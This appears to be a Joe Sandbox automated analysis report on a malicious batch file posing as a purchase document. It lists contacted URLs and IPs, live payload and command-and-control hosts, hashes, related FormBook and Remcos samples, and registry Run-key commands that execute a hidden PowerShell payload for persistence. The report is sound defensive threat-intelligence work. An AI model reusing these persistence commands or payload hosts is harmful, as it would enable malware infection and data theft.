                                                          https://avocaldoperu.com/Jouse1.pngamalsAffavocaldoperuone.com/Jouse1.pngwab.exe, 0000000A.00000002.4243548599.0000000023800000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://contoso.com/Licensepowershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.imvu.comwab.exefalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://contoso.com/Iconpowershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.nirsoft.netwab.exe, 00000011.00000002.2266923406.0000000002FB4000.00000004.00000010.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comwab.exe, 0000000A.00000002.4244066662.0000000023D40000.00000040.10000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://avocaldoperu.compowershell.exe, 00000002.00000002.2361305747.0000020B5E5A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.google.comwab.exefalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://geoplugin.net/json.gpn.net/json.gpwab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://aka.ms/pscore6lBdqpowershell.exe, 00000005.00000002.2197526043.00000000048A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://avocaldoperu.compowershell.exe, 00000002.00000002.2361305747.0000020B5E07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://contoso.com/powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2469006444.0000020B6C824000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2199790164.000000000590C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://avocaldoperuone.com/Jouse4.pngpowershell.exe, 00000002.00000002.2361305747.0000020B5E07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2361305747.0000020B5C9DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000049FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.google.com/accounts/serviceloginwab.exefalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://login.yahoo.com/config/loginwab.exefalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://geoplugin.net/json.gpXwab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.nirsoft.net/wab.exefalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2361305747.0000020B5C7B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2197526043.00000000048A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.ebuddy.comwab.exefalse
                                                          • URL Reputation: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          5.78.41.174
                                                          		411divorce.comIran (ISLAMIC Republic Of)
                                                          		16322PARSONLINETehran-IRANIRtrue
                                                          104.21.62.202
                                                          		avocaldoperu.comUnited States
                                                          		13335CLOUDFLARENETUSfalse
                                                          188.114.96.3
                                                          		www.katasoo.comEuropean Union
                                                          		13335CLOUDFLARENETUStrue
                                                          203.161.41.205
                                                          		www.shabygreen.topMalaysia
                                                          		45899VNPT-AS-VNVNPTCorpVNtrue
                                                          193.25.216.165
                                                          		cpanel-adminhost.comGermany
                                                          		10753LVLT-10753USfalse
                                                          172.111.137.132
                                                          		iwarsut775laudrye2.duckdns.orgUnited States
                                                          		36351SOFTLAYERUStrue
                                                          34.149.87.45
                                                          		td-ccm-neg-87-45.wixdns.netUnited States
                                                          		2686ATGS-MMD-ASUStrue
                                                          178.237.33.50
                                                          		geoplugin.netNetherlands
                                                          		8455ATOM86-ASATOM86NLfalse
                                                          162.241.2.92
                                                          		vendasnaweb1.comUnited States
                                                          		26337OIS1UStrue
                                                          3.33.130.190
                                                          		ctorq.netUnited States
                                                          		8987AMAZONEXPANSIONGBtrue
                                                          142.250.186.147
                                                          		ghs.googlehosted.comUnited States
                                                          		15169GOOGLEUSfalse

                                                          General Information

                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                          Analysis ID:1500456
                                                          Start date and time:2024-08-28 14:00:09 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 12m 21s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:33
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:2
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat
                                                          Detection:MAL
                                                          Classification:mal100.phis.troj.spyw.expl.evad.winBAT@50/20@15/11
                                                          EGA Information:
                                                          • Successful, ratio: 62.5%
                                                          HCA Information:
                                                          • Successful, ratio: 95%
                                                          • Number of executed functions: 201
                                                          • Number of non-executed functions: 270
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .bat
                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Execution Graph export aborted for target powershell.exe, PID 5288 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 7616 because it is empty
                                                          • Execution Graph export aborted for target powershell.exe, PID 7860 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: PO_GM_list_28082024202003180817418280824_purchase_doc_00000(991KB).bat

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          08:01:10API Interceptor211x Sleep call for process: powershell.exe modified
                                                          08:02:25API Interceptor4026335x Sleep call for process: wab.exe modified
                                                          08:03:30API Interceptor1361472x Sleep call for process: relog.exe modified
                                                          13:01:48AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Almindeligheden %outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)
                                                          13:01:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Almindeligheden %outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)
                                                          13:02:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Bilateralities %Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)
                                                          13:02:44AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Bilateralities %Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          5.78.41.174SecuriteInfo.com.Exploit.CVE-2017-11882.123.29807.9267.rtfGet hashmaliciousFormBookBrowse
                                                          • www.411divorce.com/hxac/
                                                          docs_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.411divorce.com/6rlx/?D0Pts04=Q2ZAF+B5MPpYnKblwTws72s1FRS0QoBZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53W3Ctkqsy7izJexcMbesSkfCBVyo5K3pGetYj3FpCs5hqCFg/EaJo=&Q8s=tdcd5h7ptjmdxx
                                                          SHIPPING DOCS_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.411divorce.com/6rlx/?mv0D=Q2ZAF+B5MPpYnKbk8zx56B5rL1aOA7pZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53WlSV2qsC0iw14ssBnKMCkfzBn744B3pSPmJk=&Jj=kpS8
                                                          purchase order_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • www.411divorce.com/6rlx/?MdEl=Q2ZAF+B5MPpYnKbk8zx56B5rL1aOA7pZYrcwSpUNeInn+zCIhLxwZygB7Wu/ELLY+MlDUKKO21LBMLVVY53WlSV2qsC0iw14ssBnKMCkfzBn744B3pSPmJk=&cv4D=Bv0xSH88iTF48zS0
                                                          188.114.96.3709876765465.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                          • www.coinwab.com/kqqj/
                                                          http://allegro-8888.com/Get hashmaliciousUnknownBrowse
                                                          • allegro-8888.com/xml/index.html
                                                          PO_112234525626823775.jsGet hashmaliciousLokibotBrowse
                                                          • werdotx.shop/Devil/PWS/fre.php
                                                          nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
                                                          • web.ad87h92j.com/4/t.bmp
                                                          pXm5oVO3Go.exeGet hashmaliciousNitolBrowse
                                                          • web.ad87h92j.com/4/t.bmp
                                                          QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                          • filetransfer.io/data-package/0U9QqTZ6/download
                                                          FedEx Shipping Document.scr.exeGet hashmaliciousAzorultBrowse
                                                          • l0h5.shop/CM341/index.php
                                                          Quote 1T PN40 082624.exeGet hashmaliciousFormBookBrowse
                                                          • www.lampgm.pro/em9t/
                                                          weave.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          • 671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
                                                          steam_module_x64.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                          • 671893cm.n9shka.top/eternalpipeLowProcessDbDatalifewpPublicCdn.php
                                                          203.161.41.205SecuriteInfo.com.Trojan-Downloader.Autoit.gen.3453.31793.exeGet hashmaliciousFormBookBrowse
                                                          • www.quiluxx.top/snq6/
                                                          New PO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                          • www.hellenstore.top/sfd2/
                                                          Your file name without extension goes here.exeGet hashmaliciousFormBookBrowse
                                                          • www.tfcgreen.top/mcba/
                                                          adobe_scanner12.exeGet hashmaliciousFormBookBrowse
                                                          • www.shabygreen.top/4n8t/
                                                          7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                                                          • www.shabygreen.top/4n8t/
                                                          AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                                                          • www.devtech.life/rewk/

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          td-ccm-neg-87-45.wixdns.nethttps://puffham.wixsite.com/my-site-1Get hashmaliciousUnknownBrowse
                                                          • 34.149.87.45
                                                          http://philauberson.wixsite.com/my-swisscom-2Get hashmaliciousUnknownBrowse
                                                          • 34.149.87.45
                                                          http://kafen33591.wixsite.com/my-site-1Get hashmaliciousUnknownBrowse
                                                          • 34.149.87.45
                                                          https://jcfralish.wixsite.com/currentlyGet hashmaliciousUnknownBrowse
                                                          • 34.149.87.45
                                                          https://cathymanns101.wixsite.com/my-site-1Get hashmaliciousHTMLPhisherBrowse
                                                          • 34.149.87.45
                                                          https://igphoto6.wixsite.com/websiteGet hashmaliciousUnknownBrowse
                                                          • 34.149.87.45
                                                          SecurePay from Chase Account8483 YYLRe Payment Reference.msgGet hashmaliciousUnknownBrowse
                                                          • 34.149.87.45
                                                          https://adeptpanels-dot-yamm-track.appspot.com/2eom0MELDMAZqyDf58Qb-CaUFsI-c48Rnne-PZO1JwR-iPuRvkQHzPSswovRZymRH_kluMA6Z9jOLPPEI8OM3nIm-kmmN4wULHh9TcdnRj0ERzmv9SqeinqqRgtAJ-iMkdlIB6mujl4X-M9b7wZ65ft6ApGqOJL4diw5gOaAYwQWaCarvoV3E2VGG7Vl6X5YEvrRnuYUy4bD3rhvMpRAX_3vDSS0Uml4qjpgTfjXVYzhvRZZl3P9eDiT4iKvuKg4lxDjHAILKr1cW2MqcI_Qm7zM5LQnA-SAfAa297-DWqo6Pmg_YmPScvZfSaReawjPVY7C1ZEXSWvnoMUBG1fR1Pz-BCQGet hashmaliciousUnknownBrowse
                                                          • 34.149.87.45
                                                          https://www.adeptpanels.com/responsepoint-tech?utm_source=direct_mailer&nx_name=Tomer+Imber&nx_id=RP106334&utm_content=mail1&utm_campaign=ResponsePoint_Tech_Del_14to22_13Aug_2024&utm_medium=CTA&nx_email=tomer_i@optimove.comGet hashmaliciousUnknownBrowse
                                                          • 34.149.87.45
                                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.29807.9267.rtfGet hashmaliciousFormBookBrowse
                                                          • 34.149.87.45
                                                          www.shabygreen.topadobe_scanner12.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.41.205
                                                          7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.41.205
                                                          cpanel-adminhost.comPO_GM260820242020031808174KR18260824_purchase_doc_00000(991KB).vbsGet hashmaliciousFormBook, GuLoader, RemcosBrowse
                                                          • 193.25.216.165
                                                          Dhl_air_waybill_shipping_documents_original_BL_CI&PL_13_08_2024_00000000_doc.vbsGet hashmaliciousUnknownBrowse
                                                          • 193.25.216.165
                                                          geoplugin.netAugust Shipment - Inv No. 041.xlsGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.32304.23264.rtfGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          PO_304234.xlsGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          RFQ No. 109078906v.xla.xlsxGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.24463.26706.rtfGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.10965.14600.rtfGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          another.rtfGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          rnr.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50
                                                          thrylPXnvfySmGN.exeGet hashmaliciousRemcosBrowse
                                                          • 178.237.33.50

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CLOUDFLARENETUShttps://redtrain.top/offiperry?login=sarah.bourke@zendesk.comGet hashmaliciousUnknownBrowse
                                                          • 104.17.25.14
                                                          https://zngw.officeinvoicedoc.com/DhpuIGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • 172.64.41.3
                                                          https://silverangelshomes.com/res444.php?4-68747470733a2f2f684a456d2e6c64656e626572616e2e636f6d2f4d33306830536a4f2f-Get hashmaliciousHTMLPhisherBrowse
                                                          • 188.114.96.3
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • 172.64.41.3
                                                          Scanned copy payment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.97.3
                                                          pcsx2-v2.0.2-windows.exeGet hashmaliciousLummaCBrowse
                                                          • 188.114.97.3
                                                          qbvytVOPN0.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                          • 104.21.84.50
                                                          https://nr-srpack-dk-payment-conformations.fushenq.com/Get hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          CcPVItZy6w.exeGet hashmaliciousLummaCBrowse
                                                          • 188.114.97.3
                                                          PARSONLINETehran-IRANIRSecuriteInfo.com.Exploit.CVE-2017-11882.123.29807.9267.rtfGet hashmaliciousFormBookBrowse
                                                          • 5.78.41.174
                                                          x86.elfGet hashmaliciousMiraiBrowse
                                                          • 178.169.26.221
                                                          file.exeGet hashmaliciousVidarBrowse
                                                          • 188.245.87.202
                                                          FE89Nae47k.exeGet hashmaliciousVidarBrowse
                                                          • 188.245.87.202
                                                          66b0ba4420669_main.exeGet hashmaliciousVidarBrowse
                                                          • 188.245.87.202
                                                          66b09f01e0030_dozkey.exeGet hashmaliciousVidarBrowse
                                                          • 188.245.87.202
                                                          lem.exeGet hashmaliciousVidarBrowse
                                                          • 188.245.87.202
                                                          mek_n_bat.batGet hashmaliciousUnknownBrowse
                                                          • 188.245.88.234
                                                          EVnD2SuX13.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 5.78.169.169
                                                          docs_pdf.exeGet hashmaliciousFormBookBrowse
                                                          • 5.78.41.174
                                                          VNPT-AS-VNVNPTCorpVNIMG_00991ORDER_FILES.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 203.161.42.73
                                                          http://o62arw.dsjpropertymanagementllc.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                          • 203.161.38.167
                                                          INVG0088 LHV3495264 BL327291535V.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.42.73
                                                          #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 203.161.46.205
                                                          AIDHL3290435890.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.43.228
                                                          SALARY OF AUG 2024.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.41.190
                                                          http://o62arw.dsjpropertymanagementllc.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                          • 203.161.38.167
                                                          PO#4510065525.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.43.228
                                                          Quote 1T PN40 082624.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.46.201
                                                          MAPAL AMENDED PI SO23000680.exeGet hashmaliciousFormBookBrowse
                                                          • 203.161.55.124
                                                          CLOUDFLARENETUShttps://redtrain.top/offiperry?login=sarah.bourke@zendesk.comGet hashmaliciousUnknownBrowse
                                                          • 104.17.25.14
                                                          https://zngw.officeinvoicedoc.com/DhpuIGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • 172.64.41.3
                                                          https://silverangelshomes.com/res444.php?4-68747470733a2f2f684a456d2e6c64656e626572616e2e636f6d2f4d33306830536a4f2f-Get hashmaliciousHTMLPhisherBrowse
                                                          • 188.114.96.3
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • 172.64.41.3
                                                          Scanned copy payment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.97.3
                                                          pcsx2-v2.0.2-windows.exeGet hashmaliciousLummaCBrowse
                                                          • 188.114.97.3
                                                          qbvytVOPN0.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                          • 104.21.84.50
                                                          https://nr-srpack-dk-payment-conformations.fushenq.com/Get hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          CcPVItZy6w.exeGet hashmaliciousLummaCBrowse
                                                          • 188.114.97.3

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0eScanned copy payment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.62.202
                                                          Request for Quotation No. KTC 56376.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.62.202
                                                          Revised PI 28 08 2024.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.21.62.202
                                                          GCBrnEGE22coKRz.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 104.21.62.202
                                                          https://aka.ms/LearnAboutSenderIdentificationGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.21.62.202
                                                          Scan000406860.exeGet hashmaliciousSnake KeyloggerBrowse
                                                          • 104.21.62.202
                                                          update.exeGet hashmaliciousMetasploitBrowse
                                                          • 104.21.62.202
                                                          Port Agency Appointment - VELOS ONYX.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.21.62.202
                                                          UNITY SAKURA - VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.21.62.202
                                                          BGC-2024-EST-001 & BGC-2024-DST-003.xlsx.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.21.62.202
                                                          37f463bf4616ecd445d4a1937da06e19IMS64.dll.dllGet hashmaliciousBruteRatelBrowse
                                                          • 104.21.62.202
                                                          IMS64.dll.dllGet hashmaliciousBruteRatelBrowse
                                                          • 104.21.62.202
                                                          Payment_Advice.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 104.21.62.202
                                                          Apponde2.exeGet hashmaliciousAveMaria, UACMe, XRedBrowse
                                                          • 104.21.62.202
                                                          file.exeGet hashmaliciousMeduza StealerBrowse
                                                          • 104.21.62.202
                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 104.21.62.202
                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 104.21.62.202
                                                          x64_x32_installer__v4.4.9.msiGet hashmaliciousUnknownBrowse
                                                          • 104.21.62.202
                                                          file.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 104.21.62.202
                                                          Setup.exeGet hashmaliciousVidarBrowse
                                                          • 104.21.62.202

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

                                                          Download File
                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):962
                                                          Entropy (8bit):5.013811273052389
                                                          Encrypted:false
                                                          SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                          MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                          SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                          SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                          SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                          Malicious:false
                                                          Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):11608
                                                          Entropy (8bit):4.8908305915084105
                                                          Encrypted:false
                                                          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                                                          MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                                                          SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                                                          SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                                                          SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                                                          Malicious:false
                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Download File
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1412
                                                          Entropy (8bit):5.4341426742178625
                                                          Encrypted:false
                                                          SSDEEP:24:35we1WSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NK3R8CiagUMEOsr:+kWSU4xympjms4RIoU99tK8NWR8CN/OS
                                                          MD5:650442BF25AE2C56DB058CC0066DB72D
                                                          SHA1:17399EA4E4386F13344E6EDE6ED1CD5F54098E16
                                                          SHA-256:85004E8DD992D4E1F4AEC60728DAFF66F39B2AA1AE062D2BEBF21E29DBD9899B
                                                          SHA-512:8D502B37B20456610F509CEC991FB75794E915D8EF5D2691752FDC03B032272178FBD8F3D698940DDC4B70693F3CE809301BA2F1445CB4F9334E11076B321564
                                                          Malicious:false
                                                          Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                          C:\Users\user\AppData\Local\Temp\Andragendet8.vbs

                                                          Download File
